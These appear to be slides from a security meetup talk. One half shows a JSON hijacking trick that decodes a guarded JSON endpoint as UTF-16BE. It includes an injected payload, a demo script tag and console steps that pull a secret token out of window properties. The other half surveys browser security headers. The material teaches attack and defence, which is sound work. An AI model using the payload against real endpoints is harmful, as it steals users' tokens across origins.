One Trick and One Treat
Renato Rodrigues - @SiMpS0N - //pathonproject.com
ØxOPOSɆC Mɇɇtuᵽ [0x6F] - The Meet
Trick
𝐔ni͓̽co̷d乇
Specify a charset on the script tag
<script src="//JSON-ENDPOINT" charset="utf-16be"></script>
The endpoint itself declares UTF-8:
Content-Type: application/json; charset=utf-8
The charset attribute asks the browser to decode those same bytes as UTF-16BE instead.
The weird case of JSON Hijack
The endpoint puts an infinite-loop guard in front of the JSON, and reflects the uid parameter unescaped:
while(1);[{token:"secret1",uid:"INJECTION"}]
Remember: UTF-8 (ASCII is 1 byte per char) | UTF-16 (2 bytes per code unit) | UTF-32 (4 bytes per code unit)
Goals:
- Decode the response with a non-ASCII-compatible encoding, so that while(1) never appears and the guard never loops;
- Still end up with valid JavaScript.
while(1) ... -> To Unicode
>`\u{77}\u{68}\u{69}\u{6c}\u{65}\u{28}\u{31}\u{29}`
"while(1)"
Decode the same bytes as UTF-16BE: each pair of bytes becomes one code unit
>`\u{7768}\u{696c}\u{6528}\u{3129}`
"睨楬攨ㄩ" ...
Every pair turns into a CJK or Bopomofo letter, and those are valid JavaScript identifier characters.
Since the JSON endpoint reflects uid unescaped, inject
"%00=%001%00/%00/"
i.e. the bytes 00 3D 00 31 00 2F 00 2F, which decode as "=1//" under UTF-16BE.
The response now reads 睨楬攨ㄩ...=1//..., an assignment to an undeclared identifier:
it creates a property on the "window" object whose name is the JSON bytes, and the // comments out the rest of the line.
The injection point has to sit at an even byte offset, otherwise the byte pairs do not line up.
Read the last property set:
Object.keys(self).pop()
JSON content will be inside its bytes!
DEMO
<script charset="utf-16be" src="http://demo.vwzq.net/php/secret.php?uid=%00=%001%00%2f%00%2f"></script>
<script>alert(unescape(escape((Object.keys(window).pop())).replace(/%u(..)(..)/g,'%$1%$2')).substr(18,7))</script>
Step by step in the console:
> Object.keys(window).pop()
"睨楬攨ㄩ㭛筴潫敮㨢獥捲整ㄢⱵ楤㨢"
> escape("睨楬攨ㄩ㭛筴潫敮㨢獥捲整ㄢⱵ楤㨢")
"%u7768%u696C%u6528%u3129%u3B5B%u7B74%u6F6B%u656E%u3A22%u7365%u6372%u6574%u3122%u2C75%u6964%u3A22"
> "%u7768%u696C%u6528%u3129%u3B5B%u7B74%u6F6B%u656E%u3A22%u7365%u6372%u6574%u3122%u2C75%u6964%u3A22".replace(/%u(..)(..)/g,'%$1%$2')
"%77%68%69%6C%65%28%31%29%3B%5B%7B%74%6F%6B%65%6E%3A%22%73%65%63%72%65%74%31%22%2C%75%69%64%3A%22"
> unescape("%77%68%69%6C%65%28%31%29%3B%5B%7B%74%6F%6B%65%6E%3A%22%73%65%63%72%65%74%31%22%2C%75%69%64%3A%22")
"while(1);[{token:"secret1",uid:""
> 'while(1);[{token:"secret1",uid:"'.substr(18,7)
"secret1"
TREAT
Classic Sec. Headers
X-XSS-Protection (controls the browser's reflected-XSS filter; Chromium has since removed that filter)
X-Frame-Options
X-Content-Type-Options
Strict-Transport-Security
Public-Key-Pins (HPKP; deprecated, current browsers no longer enforce pins)
Content-Security-Policy
"New"Sec. Headers
Referrer-Policy
HTTP header governs which referrer information, sent in the Referrer header, should be included with requests made.
Referrer-Policy: no-referrer
Referrer-Policy: no-referrer-when-downgrade
Referrer-Policy: origin
Referrer-Policy: origin-when-cross-origin
Referrer-Policy: same-origin
Referrer-Policy: strict-origin
Referrer-Policy: strict-origin-when-cross-origin
Referrer-Policy: unsafe-url
Feature-Policy
Feature Policy lets a site enable or disable certain browser features and APIs, for itself and for its iframes, in the interest of better security and privacy. (The header has since been renamed Permissions-Policy, with a new value syntax.)
Feature-Policy:
accelerometer 'none';
camera 'none';
geolocation 'none';
gyroscope 'none';
microphone 'none';
payment 'none';
usb 'none';
push 'self'
...
Directives are separated by ';' and sent as one header line.
"New"Sec. Headers
Suborigins
Clear Site Data
Mechanism for programmatically defining origins to isolate different applications running in the same physical origin.
Clears browsing data (cookies, storage, cache) associated with the requesting website.
"New"Sec. Headers
The End!